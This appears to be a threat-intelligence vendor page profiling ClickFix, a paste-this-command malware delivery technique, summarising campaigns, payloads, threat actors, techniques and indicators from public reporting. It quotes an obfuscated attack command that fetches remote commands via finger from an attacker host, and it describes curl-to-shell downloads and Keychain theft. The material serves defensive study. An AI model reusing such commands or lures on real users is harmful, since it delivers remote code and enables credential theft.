ClickFix is a social-engineering malware delivery technique and mature malware-as-a-service ecosystem that tricks victims into manually executing attacker-supplied commands, typically through fake CAPTCHA checks, browser update prompts, meeting errors, or other verification lures. Rather than exploiting a software vulnerability, ClickFix relies on clipboard manipulation and user-driven execution, commonly instructing victims to paste commands into Windows Run, Windows Terminal, macOS Terminal, or Linux shells. The technique has been used across compromised websites, watering-hole operations, malvertising, SEO poisoning, phishing, and fake meeting or job-interview workflows.
ClickFix commonly serves as initial access for follow-on malware including infostealers, remote access trojans, loaders, and post-exploitation implants. Observed payloads delivered through ClickFix include Lumma Stealer, NetSupport, AsyncRAT, XWorm, DarkGate, SectopRAT, Python-based RATs, Perl-based stealers targeting macOS and Linux, and actor-specific malware associated with North Korean and other state-linked operations. Delivery chains frequently abuse legitimate system binaries and scripting environments such as PowerShell, mshta, rundll32, curl, Deno, Python, and pcalua.exe to blend malicious activity with normal operating-system behavior and evade parent-process or static detection.
Operationally, ClickFix infrastructure has evolved from simple lure pages into API-driven backends that generate unique obfuscated commands per victim, support multiple operators, tailor payloads by operating system, and rotate infrastructure rapidly. Some campaigns use blockchain-based dead drops or smart contracts to retrieve next-stage configuration or payload locations, increasing resilience and complicating static blocking. Variants and related branding such as CrashFix, FileFix, PromptFix, InstallFix, and ClickFake Interview reflect the same core model of coercing users to execute attacker-controlled content under the guise of fixing an error, proving they are human, or joining a meeting.
ClickFix campaigns have targeted consumers, enterprise users, university communities, job seekers, and especially cryptocurrency and Web3 personnel. Associated threat activity includes financially motivated cybercrime as well as state-linked operations attributed in public reporting to groups including BlueNoroff, APT28, MuddyWater, and Kimsuky. Depending on the delivered payload, post-execution behavior can include credential theft, browser cookie and session theft, keylogging, reconnaissance, persistence, defense evasion, exfiltration, remote command execution, and broader hands-on-keyboard intrusion activity.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
The attackers used the Ghost CMS vulnerability to tamper with website articles by appending malicious JavaScript loaders to the bottom of pages. These loaders were designed to support ClickFix attacks — a growing social engineering tactic that tricks users into manually executing malware on their systems. | A critical Ghost CMS vulnerability identified as CVE-2026-26980 has been exploited in a widespread cyber campaign that compromised more than 700 websites... The Ghost CMS vulnerability is an SQL injection flaw affecting Ghost’s Content API.
9 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Jumpsec said in a report shared with Cyber Security News (CSN) that the kit impersonates Zoom and Teams meetings while quietly profiling wallets and guiding victims into a ClickFix paste step.
Jumpsec said in a report shared with Cyber Security News (CSN) that the kit impersonates Zoom and Teams meetings while quietly profiling wallets and guiding victims into a ClickFix paste step.
title : ClickFix to EtherHiding description : A single pasted command that ran all the way to a Python RAT reading its C2 off the Ethereum blockchain.
ClickFix, the trick that fools people into running malware by hand, has quietly grown a back office. New research shows the malicious commands behind its fake "prove you're human" pages are now handed out by API-driven servers that give each visitor the same malware in a different disguise.
ClickFix, the trick that fools people into running malware by hand, has quietly grown a back office. New research shows the malicious commands behind its fake "prove you're human" pages are now handed out by API-driven servers that give each visitor the same malware in a different disguise.
ClickFix, the trick that fools people into running malware by hand, has quietly grown a back office. New research shows the malicious commands behind its fake "prove you're human" pages are now handed out by API-driven servers that give each visitor the same malware in a different disguise.
32 distinct techniques documented for this family, organized by ATT&CK tactic.
Victims are tricked into executing a crafted command that initiates PowerShell, spawns cmd.exe via WMI, and mounts a remote WebDAV share.
Une tâche planifiée maintient la communication C2 via deno.exe exécutant un JavaScript distant.
The script uses base64 decoding and an XOR key to execute the EtherHiding loader seamlessly.
The decoded payload is a daemon... and calls back to genomicsforge[.]com for an AppleScript payload (on macOS) executed via osascript.
cmd.exe /c s^t^a^r^t "" /min for /f "delims=@" %o in ('finger NriTDRRnWE@finger.claudeam.com') do %o
The real action is a curl request to genomicsforge[.]com that downloads and immediately pipes a shell script to zsh.
Exécution d’un payload JavaScript distant hébergé sur infrastructure attaquante via deno.exe
Via osascript, the attacker can read files, access the macOS Keychain, capture screenshots, and automate GUI apps to export saved passwords.
Carets are inserted between every character of start, finger, and the domain, so neither the command name nor finger.claudeam.com exists as a contiguous string anywhere in the command line.
A newly observed ClickFix variant abuses the legitimate Windows binary pcalua.exe to evade parent-process detection and launch malicious activity.
Via osascript, the attacker can read files, access the macOS Keychain, capture screenshots, and automate GUI apps to export saved passwords.
Rather than hardcoding command-and-control infrastructure, the script dynamically retrieves its configuration from a Polygon blockchain smart contract, allowing attackers to rotate infrastructure without modifying compromised sites.
Une tâche planifiée maintient la communication C2 via deno.exe exécutant un JavaScript distant.
501 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
72 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
ClickFix is described as the social-engineering/infection technique used to lure users into executing a malicious PowerShell command from the clipboard, initiating the intrusion chain.
A socially engineered malware delivery scheme/loader variant that tricks victims into executing a crafted command, launches PowerShell and cmd.exe via WMI, mounts a remote WebDAV share, retrieves payloads over CDN-backed HTTPS infrastructure, and executes a malicious DLL with rundll32.exe.
Mentioned only as a related social-engineering/lure context for malicious PowerShell execution, not as the main malware under analysis.
A social-engineering malware delivery technique/tooling chain that tricks victims into pasting and executing malicious commands under the guise of fixing Zoom/Teams audio or camera issues, leading to payload delivery.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.